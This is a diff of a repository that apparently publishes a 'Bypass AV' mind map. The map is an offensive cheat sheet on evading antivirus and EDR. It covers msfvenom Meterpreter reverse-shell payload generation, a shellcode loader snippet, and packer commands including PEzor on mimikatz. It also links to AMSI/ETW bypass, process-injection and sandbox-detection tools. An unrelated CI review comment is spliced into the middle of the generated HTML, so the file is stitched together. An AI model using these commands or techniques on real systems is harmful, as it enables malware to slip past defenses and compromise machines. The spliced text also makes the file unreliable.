diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml
new file mode 100644
index 0000000..0e51bec
--- /dev/null
+++ b/.github/workflows/ci.yaml
@@ -0,0 +1,34 @@
+name: Generate the new index.html if necessary and upload as artifact
+
+on:
+ pull_request:
+ push:
+ branches:
+ - main
+
+jobs:
+ generate-index-html:
+ name: Validate Go code linting
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout code
+ uses: actions/checkout@v3
+ - name: Set Node.js 16.x
+ uses: actions/setup-node@v3
+ with:
+ node-version: 16.x
+ - name: Install markmap-cli
+ run: npm install -g markmap-cli
+ - name: Run markmap-cli to export as HTML
+ run: markmap Bypass-AV.md -o docs/index.html
+ - name: Run markmap-cli to export as HTML
+ run: markmap Bypass-AV.md -o docs/index.html
+ - name: Commit the new HTML index file if necessary
+ uses: stefanzweifel/git-auto-commit-action@v4
+ with:
+ commit_message: Auto-update the index.html
+ file_pattern: docs/index.html
+ - uses: actions/upload-artifact@v3
+ with:
+ name: index.html
+ path: docs/index.html
diff --git a/docs/index.html b/docs/index.html
index de5e4bd..7611f5a 100644
--- a/docs/index.html
+++ b/docs/index.html
@@ -16,13 +16,13 @@ height: 100vh; } - + - + })(() => window.markmap,null,{"type":"heading","depth":0,"payload":{"lines":[0,1]},"content":"Bypass AV","children":[{"type":"heading","depth":1,"payload":{"lines":[2,3]},"content":"Manual loader","children":[{"type":"heading","depth":2,"payload":{"lines":[4,5]},"content":"Reminder","children":[{"type":"list_item","depth":3,"payload":{"lines":[6,7],"index":1},"content":"1. allocating memory"},{"type":"list_item","depth":3,"payload":{"lines":[7,8],"index":2},"content":"2. moving shellcode into that memory"},{"type":"list_item","depth":3,"payload":{"lines":[8,9],"index":3},"content":"3. executing the shellcode"}]},{"type":"heading","depth":2,"payload":{"lines":[10,11]},"content":"C","children":[{"type":"list_item","depth":3,"payload":{"lines":[12,27]},"content":"
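Review bot: The auto-commit step also runs under the `pull_request` trigger, where the default `GITHUB_TOKEN` is read-only for pull requests from forks and the checkout is a detached merge commit, so `stefanzweifel/git-auto-commit-action@v4` will most likely fail there; gate it with `if: github.event_name == 'push'` and declare `permissions: contents: write` on the job so the write scope is explicit instead of inherited from the repository default. The step "Run markmap-cli to export as HTML" appears twice back to back and the job name "Validate Go code linting" reads as a copy-paste leftover; drop the second step and rename the job to match what it does. `npm install -g markmap-cli` resolves to whatever version is latest at run time, so a broken or compromised release lands directly in the regenerated `docs/index.html` that is then committed and published; pin it, e.g. `npm install -g markmap-cli@<PINNED_VERSION>` (constructed placeholder), and for the same reason consider pinning the actions to commit SHAs rather than the floating `@v3`/`@v4` tags.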
#include <iostream>\n#include <Windows.h>\n\nint main(void) {\n  HMODULE hMod = LoadLibrary("shellcode.dll");\n  if (hMod == nullptr) {\n    cout << "Failed to load shellcode.dll" << endl;\n  }\n\n  return 0;\n}\n
\n"}]},{"type":"heading","depth":2,"payload":{"lines":[27,28]},"content":"C++","children":[{"type":"list_item","depth":3,"payload":{"lines":[29,30]},"content":"https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8"},{"type":"list_item","depth":3,"payload":{"lines":[30,31]},"content":"https://github.com/ReversingID/Shellcode-Loader/tree/master/windows"}]},{"type":"heading","depth":2,"payload":{"lines":[32,33]},"content":".NET","children":[{"type":"list_item","depth":3,"payload":{"lines":[34,35]},"content":"https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/"}]},{"type":"heading","depth":2,"payload":{"lines":[36,37]},"content":"Ruby","children":[{"type":"list_item","depth":3,"payload":{"lines":[38,39]},"content":"https://blog.king-sabri.net/red-team/how-to-execute-raw-shellcode-using-ruby-on-windows-and-linux"}]}]},{"type":"heading","depth":1,"payload":{"lines":[40,41]},"content":"Automatic loader","children":[{"type":"heading","depth":2,"payload":{"lines":[42,43]},"content":"C++","children":[{"type":"list_item","depth":3,"payload":{"lines":[44,45]},"content":"https://github.com/TheD1rkMtr/D1rkLrd"},{"type":"list_item","depth":3,"payload":{"lines":[45,46]},"content":"https://github.com/xuanxuan0/DripLoader"},{"type":"list_item","depth":3,"payload":{"lines":[46,47]},"content":"https://github.com/Hagrid29/PELoader"},{"type":"list_item","depth":3,"payload":{"lines":[47,48]},"content":"https://github.com/icyguider/Shhhloader"}]},{"type":"heading","depth":2,"payload":{"lines":[49,50]},"content":"C","children":[{"type":"list_item","depth":3,"payload":{"lines":[51,52]},"content":"https://github.com/cribdragg3r/Alaris"},{"type":"list_item","depth":3,"payload":{"lines":[52,53]},"content":"https://github.com/trustedsec/COFFLoader"}]},{"type":"heading","depth":2,"payload":{"lines":[54,55]},"content":"Nim","children":[{"type":"list_item","depth":3,"payload":{"lines":[56,57]},"content":"https://github.com/aever
j/NimShellCodeLoader"},{"type":"list_item","depth":3,"payload":{"lines":[57,58]},"content":"https://github.com/sh3d0ww01f/nim_shellloader"}]},{"type":"heading","depth":2,"payload":{"lines":[59,60]},"content":"Go","children":[{"type":"list_item","depth":3,"payload":{"lines":[61,62]},"content":"https://github.com/EddieIvan01/gld"},{"type":"list_item","depth":3,"payload":{"lines":[62,63]},"content":"https://github.com/zha0gongz1/DesertFox"}]},{"type":"heading","depth":2,"payload":{"lines":[64,65]},"content":"Rust","children":[{"type":"list_item","depth":3,"payload":{"lines":[66,67]},"content":"https://github.com/b1tg/rs_shellcode"},{"type":"list_item","depth":3,"payload":{"lines":[67,68]},"content":"https://github.com/r4ime/shellcode_loader"},{"type":"list_item","depth":3,"payload":{"lines":[68,69]},"content":"https://github.com/cr7pt0pl4gu3/Pestilence"}]},{"type":"heading","depth":2,"payload":{"lines":[70,71]},"content":"Crystal","children":[{"type":"list_item","depth":3,"payload":{"lines":[72,73]},"content":"https://github.com/js-on/WeaponizeCrystal/blob/main/shellcode_loader/shellcode_loader.cr"}]}]},{"type":"heading","depth":1,"payload":{"lines":[74,75]},"content":"Generate shellcode","children":[{"type":"heading","depth":2,"payload":{"lines":[76,77]},"content":"msfvenom","children":[{"type":"list_item","depth":3,"payload":{"lines":[78,79]},"content":"msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<SERVER> LPORT=<PORT> -f raw"},{"type":"list_item","depth":3,"payload":{"lines":[79,80]},"content":"msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 --encrypt rc4 --encrypt-key thisisakey -f dll"},{"type":"list_item","depth":3,"payload":{"lines":[80,81]},"content":"msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai '\\x00' -i 30 RHOST=10.0.0.68 LPORT=9050 -f c | tr -d '"' | tr -d '\\n' | more"}]},{"type":"heading","depth":2,"payload":{"lines":[82,83]},"content":"C2 (Cobalt/Havoc what 
ever)"},{"type":"heading","depth":2,"payload":{"lines":[84,85]},"content":"ASM","children":[{"type":"list_item","depth":3,"payload":{"lines":[86,87]},"content":"https://nytrosecurity.com/2019/06/30/writing-shellcodes-for-windows-x64/"}]},{"type":"heading","depth":2,"payload":{"lines":[88,89]},"content":"Hyperion","children":[{"type":"list_item","depth":3,"payload":{"lines":[90,91]},"content":"wine hyperion.exe /root/payloads/shellter/shellter_putty_reverse_x86.exe"}]}]},{"type":"heading","depth":1,"payload":{"lines":[92,93]},"content":"Manual obfuscation","children":[{"type":"heading","depth":2,"payload":{"lines":[94,95]},"content":"Static","children":[{"type":"list_item","depth":3,"payload":{"lines":[96,97]},"content":"Packing","children":[{"type":"list_item","depth":4,"payload":{"lines":[97,98]},"content":"https://pentester.blog/?p=39"}]},{"type":"list_item","depth":3,"payload":{"lines":[98,99]},"content":"Polymorph","children":[{"type":"list_item","depth":4,"payload":{"lines":[99,100]},"content":"https://www.exploit-db.com/papers/13874"}]},{"type":"list_item","depth":3,"payload":{"lines":[100,101]},"content":"Signature 
hiding","children":[{"type":"list_item","depth":4,"payload":{"lines":[101,102]},"content":"https://www.ired.team/offensive-security/defense-evasion/av-bypass-with-metasploit-templates"}]},{"type":"list_item","depth":3,"payload":{"lines":[102,103]},"content":"CFG","children":[{"type":"list_item","depth":4,"payload":{"lines":[103,104]},"content":"ROP","children":[{"type":"list_item","depth":5,"payload":{"lines":[104,105]},"content":"https://improsec.com/tech-blog/bypassing-control-flow-guard-on-windows-10-part-ii"}]},{"type":"list_item","depth":4,"payload":{"lines":[105,106]},"content":"https://joshpitts.medium.com/hooking-control-flow-guard-cfg-for-fun-and-profit-31f951485545"},{"type":"list_item","depth":4,"payload":{"lines":[106,107]},"content":"https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=ade1cc22ee994c1b353326ae4cedccd29f33b8d0"},{"type":"list_item","depth":4,"payload":{"lines":[107,108]},"content":"CFG flattening","children":[{"type":"list_item","depth":5,"payload":{"lines":[108,109]},"content":"http://ac.inf.elte.hu/Vol_030_2009/003.pdf"}]}]},{"type":"list_item","depth":3,"payload":{"lines":[109,110]},"content":"Change logo/icon","children":[{"type":"list_item","depth":4,"payload":{"lines":[110,111]},"content":"https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/resources?redirectedfrom=MSDN"}]},{"type":"list_item","depth":3,"payload":{"lines":[111,112]},"content":"Change date of compilation"},{"type":"list_item","depth":3,"payload":{"lines":[112,113]},"content":"Bypass 
AMSI","children":[{"type":"list_item","depth":4,"payload":{"lines":[113,114]},"content":"https://rastamouse.me/memory-patching-amsi-bypass/"},{"type":"list_item","depth":4,"payload":{"lines":[114,115]},"content":"https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/"},{"type":"list_item","depth":4,"payload":{"lines":[115,116]},"content":"https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/"}]},{"type":"list_item","depth":3,"payload":{"lines":[116,117]},"content":"Description"}]},{"type":"heading","depth":2,"payload":{"lines":[118,119]},"content":"dynamic","children":[{"type":"list_item","depth":3,"payload":{"lines":[120,121]},"content":"Network","children":[{"type":"list_item","depth":4,"payload":{"lines":[121,122]},"content":"C2 by DNS"},{"type":"list_item","depth":4,"payload":{"lines":[122,123]},"content":"P2P (hide ip from C2)"},{"type":"list_item","depth":4,"payload":{"lines":[123,124]},"content":"HTTPS"}]},{"type":"list_item","depth":3,"payload":{"lines":[124,125]},"content":"Direct syscalls","children":[{"type":"list_item","depth":4,"payload":{"lines":[125,126]},"content":"https://medium.com/@merasor07/av-edr-evasion-using-direct-system-calls-user-mode-vs-kernel-mode-fad2fdfed01a"},{"type":"list_item","depth":4,"payload":{"lines":[126,127]},"content":"https://thewover.github.io/Dynamic-Invoke/"}]},{"type":"list_item","depth":3,"payload":{"lines":[127,128]},"content":"Delayed execution","children":[{"type":"list_item","depth":4,"payload":{"lines":[128,129]},"content":"WaitForSingleObjectEx","children":[{"type":"list_item","depth":5,"payload":{"lines":[129,130]},"content":"https://www.purpl3f0xsecur1ty.tech/2021/03/30/av_evasion.html"}]},{"type":"list_item","depth":4,"payload":{"lines":[130,131]},"content":"Foliage"},{"type":"list_item","depth":4,"payload":{"lines":[131,132]},"content":"Ekko","children":[{"type":"list_item","depth":5,"payload":{"lines":[132,133]},"content":"A small sleep obfuscation 
technique that uses CreateTimerQueueTimer Win32 API"}]},{"type":"list_item","depth":4,"payload":{"lines":[133,134]},"content":"Deathsleep","children":[{"type":"list_item","depth":5,"payload":{"lines":[134,135]},"content":"https://github.com/janoglezcampos/DeathSleep"}]}]},{"type":"list_item","depth":3,"payload":{"lines":[135,136]},"content":"Disable ETW","children":[{"type":"list_item","depth":4,"payload":{"lines":[136,137]},"content":"https://www.mdsec.co.uk/2020/03/hiding-your-net-etw/"}]},{"type":"list_item","depth":3,"payload":{"lines":[137,138]},"content":"DInvoke","children":[{"type":"list_item","depth":4,"payload":{"lines":[138,139]},"content":"https://github.com/TheWover/DInvoke"}]}]}]},{"type":"heading","depth":1,"payload":{"lines":[140,141]},"content":"Automatic obfuscation","children":[{"type":"heading","depth":2,"payload":{"lines":[142,143]},"content":"Static","children":[{"type":"list_item","depth":3,"payload":{"lines":[144,145]},"content":"Packing","children":[{"type":"list_item","depth":4,"payload":{"lines":[145,146]},"content":"Office 
macro","children":[{"type":"list_item","depth":5,"payload":{"lines":[146,147]},"content":"https://github.com/sevagas/macro_pack"},{"type":"list_item","depth":5,"payload":{"lines":[147,148]},"content":"https://github.com/optiv/Ivy"}]},{"type":"list_item","depth":4,"payload":{"lines":[148,149]},"content":"https://github.com/phra/PEzor"},{"type":"list_item","depth":4,"payload":{"lines":[149,150]},"content":"https://github.com/klezVirus/inceptor"},{"type":"list_item","depth":4,"payload":{"lines":[150,151]},"content":"https://github.com/govolution/avet"},{"type":"list_item","depth":4,"payload":{"lines":[151,152]},"content":"https://github.com/Nariod/RustPacker"},{"type":"list_item","depth":4,"payload":{"lines":[152,153]},"content":"https://github.com/DavidBuchanan314/monomorph"},{"type":"list_item","depth":4,"payload":{"lines":[153,154]},"content":"https://github.com/upx/upx"}]},{"type":"list_item","depth":3,"payload":{"lines":[154,155]},"content":"AMSI Bypass","children":[{"type":"list_item","depth":4,"payload":{"lines":[155,156]},"content":"https://github.com/CCob/SharpBlock"},{"type":"list_item","depth":4,"payload":{"lines":[156,157]},"content":"https://github.com/danielbohannon/Invoke-Obfuscation"},{"type":"list_item","depth":4,"payload":{"lines":[157,158]},"content":"https://github.com/klezVirus/Chameleon"},{"type":"list_item","depth":4,"payload":{"lines":[158,159]},"content":"https://github.com/tokyoneon/Chimera"}]},{"type":"list_item","depth":3,"payload":{"lines":[159,160]},"content":"Signature hiding","children":[{"type":"list_item","depth":4,"payload":{"lines":[160,161]},"content":"https://github.com/optiv/ScareCrow","children":[{"type":"list_item","depth":5,"payload":{"lines":[161,162]},"content":"ScareCrow -I /Path/To/ShellCode -d 
facebook.com"}]},{"type":"list_item","depth":4,"payload":{"lines":[162,163]},"content":"https://github.com/paranoidninja/CarbonCopy"}]},{"type":"list_item","depth":3,"payload":{"lines":[163,164]},"content":"LOLBIN","children":[{"type":"list_item","depth":4,"payload":{"lines":[164,165]},"content":"RemComSvc","children":[{"type":"list_item","depth":5,"payload":{"lines":[165,166]},"content":"https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb"}]}]},{"type":"list_item","depth":3,"payload":{"lines":[166,167]},"content":"Entropy","children":[{"type":"list_item","depth":4,"payload":{"lines":[167,168]},"content":"https://github.com/kleiton0x00/Shelltropy"}]}]},{"type":"heading","depth":2,"payload":{"lines":[169,170]},"content":"Dynamic","children":[{"type":"list_item","depth":3,"payload":{"lines":[171,172]},"content":"Disable ETW","children":[{"type":"list_item","depth":4,"payload":{"lines":[172,173]},"content":"https://github.com/optiv/ScareCrow"},{"type":"list_item","depth":4,"payload":{"lines":[173,174]},"content":"https://gist.github.com/tandasat/e595c77c52e13aaee60e1e8b65d2ba32"},{"type":"list_item","depth":4,"payload":{"lines":[174,175]},"content":"https://github.com/Soledge/BlockEtw"},{"type":"list_item","depth":4,"payload":{"lines":[175,176]},"content":"https://github.com/CCob/SharpBlock"}]},{"type":"list_item","depth":3,"payload":{"lines":[176,177]},"content":"Indirect syscall","children":[{"type":"list_item","depth":4,"payload":{"lines":[177,178]},"content":"https://github.com/optiv/Freeze","children":[{"type":"list_item","depth":5,"payload":{"lines":[178,179]},"content":"Freeze -I /PathToShellcode -encrypt -sandbox -o packed.exe"}]},{"type":"list_item","depth":4,"payload":{"lines":[179,180]},"content":"https://github.com/phra/PEzor","children":[{"type":"list_item","depth":5,"payload":{"lines":[180,181]},"content":"PEzor.sh -sgn -unhook -antidebug -text -syscalls -sleep=120 mimikatz/x64/mimikatz.exe -z 
2"}]},{"type":"list_item","depth":4,"payload":{"lines":[181,182]},"content":"https://github.com/optiv/ScareCrow"},{"type":"list_item","depth":4,"payload":{"lines":[182,183]},"content":"https://github.com/klezVirus/SysWhispers3"},{"type":"list_item","depth":4,"payload":{"lines":[183,184]},"content":"https://github.com/jthuraisamy/SysWhispers2"}]},{"type":"list_item","depth":3,"payload":{"lines":[184,185]},"content":"Disable AV","children":[{"type":"list_item","depth":4,"payload":{"lines":[185,186]},"content":"https://github.com/APTortellini/unDefender"}]},{"type":"list_item","depth":3,"payload":{"lines":[186,187]},"content":"Block DLL"},{"type":"list_item","depth":3,"payload":{"lines":[187,188]},"content":"https://github.com/CCob/SharpBlock"},{"type":"list_item","depth":3,"payload":{"lines":[188,189]},"content":"Detect virtual machines"},{"type":"list_item","depth":3,"payload":{"lines":[189,190]},"content":"https://github.com/a0rtega/pafish"}]}]},{"type":"heading","depth":1,"payload":{"lines":[191,192]},"content":"Process injection","children":[{"type":"heading","depth":2,"payload":{"lines":[193,194]},"content":"CRT","children":[{"type":"list_item","depth":3,"payload":{"lines":[195,196]},"content":"with suspended"},{"type":"list_item","depth":3,"payload":{"lines":[196,197]},"content":"https://damonmohammadbagher.medium.com/bypassing-anti-virus-by-creating-remote-thread-into-target-process-45f145b2ac7a"}]},{"type":"heading","depth":2,"payload":{"lines":[198,199]},"content":"APC (Asyncronous Procedure Call)","children":[{"type":"list_item","depth":3,"payload":{"lines":[200,201]},"content":"https://subscription.packtpub.com/book/security/9781789610789/8/ch08lvl1sec50/executing-the-inject-code-using-apc-queuing"}]},{"type":"heading","depth":2,"payload":{"lines":[202,203]},"content":"Process 
hollowing","children":[{"type":"list_item","depth":3,"payload":{"lines":[204,205]},"content":"https://www.ired.team/offensive-security/code-injection-process-injection/process-hollowing-and-pe-image-relocations#relocation"},{"type":"list_item","depth":3,"payload":{"lines":[205,206]},"content":"https://sevrosecurity.com/2020/04/08/process-injection-part-1-createremotethread/"}]},{"type":"heading","depth":2,"payload":{"lines":[207,208]},"content":"Thread execution hijacking","children":[{"type":"list_item","depth":3,"payload":{"lines":[209,210]},"content":"https://attack.mitre.org/techniques/T1055/003/"}]},{"type":"heading","depth":2,"payload":{"lines":[211,212]},"content":"PSC (Ptrace System Calls)"},{"type":"heading","depth":2,"payload":{"lines":[213,214]},"content":"Process Doppelganging","children":[{"type":"list_item","depth":3,"payload":{"lines":[215,216]},"content":"https://thehackernews.com/2017/12/malware-process-doppelganging.html"}]},{"type":"heading","depth":2,"payload":{"lines":[217,218]},"content":"Dll injection","children":[{"type":"bullet_list","depth":3,"payload":{"lines":[219,223]},"content":"","children":[{"type":"list_item","depth":4,"payload":{"lines":[219,220]},"content":"Reflective dll injection","children":[{"type":"list_item","depth":5,"payload":{"lines":[220,221]},"content":"https://disman.tl/2015/01/30/an-improved-reflective-dll-injection-technique.html"}]},{"type":"list_item","depth":4,"payload":{"lines":[221,222]},"content":"https://github.com/fancycode/MemoryModule"},{"type":"list_item","depth":4,"payload":{"lines":[222,223]},"content":""}]},{"type":"bullet_list","depth":3,"payload":{"lines":[224,227]},"content":"","children":[{"type":"list_item","depth":4,"payload":{"lines":[224,225]},"content":"DLL Sideloading & 
Proxying","children":[{"type":"list_item","depth":5,"payload":{"lines":[225,226]},"content":"https://book.hacktricks.xyz/windows-hardening/windows-av-bypass#dll-sideloading-and-proxying"}]}]}]},{"type":"heading","depth":2,"payload":{"lines":[227,228]},"content":"RWX","children":[{"type":"list_item","depth":3,"payload":{"lines":[229,230]},"content":"You put your region in RW, you write your shellcode, then you reprotect in RX, then you run the thread. This way your region is never in rwx"}]},{"type":"heading","depth":2,"payload":{"lines":[231,232]},"content":"COM Hijack","children":[{"type":"list_item","depth":3,"payload":{"lines":[233,234]},"content":"https://www.mdsec.co.uk/2022/04/process-injection-via-component-object-model-com-irundowndocallback/"},{"type":"list_item","depth":3,"payload":{"lines":[234,235]},"content":"https://0xpat.github.io/Abusing_COM_Objects/"}]},{"type":"heading","depth":2,"payload":{"lines":[236,237]},"content":"Remote thread","children":[{"type":"list_item","depth":3,"payload":{"lines":[238,239]},"content":"https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/"}]},{"type":"heading","depth":2,"payload":{"lines":[240,241]},"content":"User APC","children":[{"type":"list_item","depth":3,"payload":{"lines":[242,243]},"content":"https://www.cyberbit.com/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/"}]}]},{"type":"heading","depth":1,"payload":{"lines":[244,245]},"content":"Detect virtual machines (Sandbox)","children":[{"type":"heading","depth":2,"payload":{"lines":[246,247]},"content":"Software","children":[{"type":"list_item","depth":3,"payload":{"lines":[248,249]},"content":"Count processus number","children":[{"type":"list_item","depth":4,"payload":{"lines":[249,250]},"content":"if >=40 its probably not a VM"}]},{"type":"list_item","depth":3,"payload":{"lines":[250,251]},"content":"User 
interaction","children":[{"type":"list_item","depth":4,"payload":{"lines":[251,252]},"content":"Send MessageBoxW"}]},{"type":"list_item","depth":3,"payload":{"lines":[252,253]},"content":"Check for internet"},{"type":"list_item","depth":3,"payload":{"lines":[253,254]},"content":"Datetime on compilation"},{"type":"list_item","depth":3,"payload":{"lines":[254,255]},"content":"Check for Computer name","children":[{"type":"list_item","depth":4,"payload":{"lines":[255,256]},"content":"VM = DESKTOP-[0-9A-Z]{7}"}]}]},{"type":"heading","depth":2,"payload":{"lines":[257,258]},"content":"Hardware","children":[{"type":"list_item","depth":3,"payload":{"lines":[259,260]},"content":"CPUID timing","children":[{"type":"list_item","depth":4,"payload":{"lines":[260,261]},"content":"https://github.com/CMEPW/bof-collection/blob/main/src/checkVM/checkVM2.c"}]},{"type":"list_item","depth":3,"payload":{"lines":[261,262]},"content":"Typical user workstation has a processor with at least 2 cores, a minimum of 2 GB of RAM and a 100 GB hard drive"}]},{"type":"heading","depth":2,"payload":{"lines":[263,264]},"content":"OSX","children":[{"type":"list_item","depth":3,"payload":{"lines":[265,266]},"content":"https://evasions.checkpoint.com/techniques/macos.html#macos-sandbox-methods"}]},{"type":"heading","depth":2,"payload":{"lines":[267,268]},"content":"Tools","children":[{"type":"list_item","depth":3,"payload":{"lines":[269,270]},"content":"https://github.com/a0rtega/pafish"}]}]},{"type":"heading","depth":1,"payload":{"lines":[271,272]},"content":"From PE to 
shellcode","children":[{"type":"list_item","depth":2,"payload":{"lines":[273,274]},"content":"https://github.com/S4ntiagoP/donut/tree/syscalls"},{"type":"list_item","depth":2,"payload":{"lines":[274,275]},"content":"https://github.com/hasherezade/pe_to_shellcode"},{"type":"list_item","depth":2,"payload":{"lines":[275,276]},"content":"https://github.com/monoxgas/sRDI"}]},{"type":"heading","depth":1,"payload":{"lines":[277,278]},"content":"From alive beacon","children":[{"type":"heading","depth":2,"payload":{"lines":[279,280]},"content":"Havoc","children":[{"type":"list_item","depth":3,"payload":{"lines":[281,282]},"content":"dotnet (object file)"}]},{"type":"heading","depth":2,"payload":{"lines":[283,284]},"content":"Cobalt","children":[{"type":"list_item","depth":3,"payload":{"lines":[285,286]},"content":"BoF (Beacon object file)","children":[{"type":"list_item","depth":4,"payload":{"lines":[286,287]},"content":"From .net to BoF","children":[{"type":"list_item","depth":5,"payload":{"lines":[287,288]},"content":"https://github.com/CCob/BOF.NET"}]},{"type":"list_item","depth":4,"payload":{"lines":[288,289]},"content":"https://github.com/trustedsec/CS-Situational-Awareness-BOF"}]}]}]},{"type":"heading","depth":1,"payload":{"lines":[290,291]},"content":"Extensions","children":[{"type":"heading","depth":2,"payload":{"lines":[292,293]},"content":"Dll"},{"type":"heading","depth":2,"payload":{"lines":[294,295]},"content":"Exe"},{"type":"heading","depth":2,"payload":{"lines":[296,297]},"content":"Hta"},{"type":"heading","depth":2,"payload":{"lines":[298,299]},"content":"Cpl"},{"type":"heading","depth":2,"payload":{"lines":[300,301]},"content":"Link"}]},{"type":"heading","depth":1,"payload":{"lines":[302,303]},"content":"Crédits","children":[{"type":"list_item","depth":2,"payload":{"lines":[304,305]},"content":"@Jenaye_fr"},{"type":"list_item","depth":2,"payload":{"lines":[305,306]},"content":"LeDocteurDesBits"},{"type":"list_item","depth":2,"payload":{"lines":[306,307]},"con
tent":"michmich1000"},{"type":"list_item","depth":2,"payload":{"lines":[307,308]},"content":"@Zabannn"},{"type":"list_item","depth":2,"payload":{"lines":[308,309]},"content":"@noraj_rawsec"},{"type":"list_item","depth":2,"payload":{"lines":[309,310]},"content":"@lapinousexy"}]},{"type":"heading","depth":1,"payload":{"lines":[311,312]},"content":"Pro tips : A shellcode sent in 3 open sources packer will have more chance to be caught than a manual obfuscation"}]},{"colorFreezeLevel":3,"initialExpandLevel":2})